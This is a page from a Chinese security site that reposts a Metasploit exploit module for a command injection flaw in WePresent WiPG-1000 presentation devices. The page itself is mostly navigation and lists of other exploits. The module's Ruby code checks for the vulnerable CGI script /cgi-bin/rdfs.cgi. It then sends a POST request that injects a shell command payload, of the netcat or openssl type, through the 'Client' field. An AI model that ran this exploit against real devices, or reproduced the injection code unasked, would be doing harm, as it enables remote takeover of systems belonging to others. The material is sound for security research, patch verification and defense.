首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WePresent WiPG-1000 Command Injection
来源:metasploit.com 作者:Brun 发布时间:2017-04-25  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'WePresent WiPG-1000 Command Injection',
      'Description'    => %q{
        This module exploits a command injection vulnerability in an undocumented
        CGI file in several versions of the WePresent WiPG-1000 devices.
        Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matthias Brun', # Vulnerability Discovery, Metasploit Module
        ],
      'References'     =>
        [
          [ 'URL', 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt' ]
        ],
      'Payload'        =>
        {
          'Compat'     =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic netcat openssl'
            }
        },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['WiPG-1000 <=2.0.0.7', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 20 2017',
      'DefaultTarget'  => 0))
  end


  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri('/cgi-bin/rdfs.cgi')
    })
    if res and res.body =~ /Follow administrator instructions to enter the complete path/ then
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status('Sending request')
    send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri('/cgi-bin/rdfs.cgi'),
      'vars_post' => {
        'Client' => ";#{payload.encoded};",
        'Download' => 'Download'
      }
    )
  end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Gnome Keyring Daemon Credentia
·Disk Sorter Enterprise 9.5.12
·Easy MOV Converter 1.4.24 - Lo
·Microsoft Office Word Maliciou
·SquirrelMail < 1.4.22 - Remote
·PrivateTunnel Client 2.8 - Loc
·VirtualBox 5.1.14 r112924 - Un
·Dell Customer Connect 1.3.28.0
·Microsoft Windows 10 10586 - I
·LightDM (Ubuntu 16.04/16.10) -
·Apple WebKit / Safari 10.0.2(1
·OpenText Documentum Content Se
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved